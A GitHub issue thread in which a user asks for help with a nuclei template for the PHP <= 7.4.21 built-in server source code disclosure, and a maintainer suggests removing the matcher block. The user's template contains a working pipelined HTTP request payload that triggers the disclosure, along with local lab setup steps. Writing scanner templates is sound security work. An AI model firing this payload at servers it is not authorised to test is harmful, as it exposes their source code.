Unable to get complete server response using extractors
Opened this issue · 5 comments
I want to write a template to exploit the vulnerability of php source code disclosure<=7.4.21, but I cannot match the result using nucleie
I used wireshark to monitor traffic and found that the server returned body
I tried the following methods, but could not output the body content returned by the server
I checked the history of issus and found no relevant problems, but I found that print can be used_ Debug prints the returned results. I use print_ Debug View the returned results, and no body content is found
I'm sorry to bother you
@LinuxProgramDevelop Just remove the matcher block if you are only looking to extract the info.
Sorry, my English is not good. My problem is that the server's phpinfo code in the second picture is not in the result in the fourth picture
@LinuxProgramDevelop Just remove the matcher block if you are only looking to extract the info.
My payload has been sent, and the server has returned the source code of php, but there is no phpinfo code in the data of nuclie, so I cannot judge the success of the attack
this is my template
id: php-src-diclosure
info:
name: PHP <= 7.4.21 - Built-in Server Remote Source Disclosure
author: pdteam
severity: medium
metadata:
verified: true
shodan-query: The requested resource <code class="url">
tags: php,phpcli,disclosure
network:
- inputs:
- data: "GET index.php HTTP/1.1\nHost: 172.17.0.131:888\n\nGET /xyz.xyz HTTP/1.1\n\n"
host:
- "{{Hostname}}"
read-size: 4096
extractors:
- type: regex
part: all
regex:
- '(.*\n.*.*)'The vulnerability environment can be started with the following command:
php.exe -S 0.0.0.0:888 -n -t ./
Place an index.php file in the current directory. The content is: <? php phpinfo();?>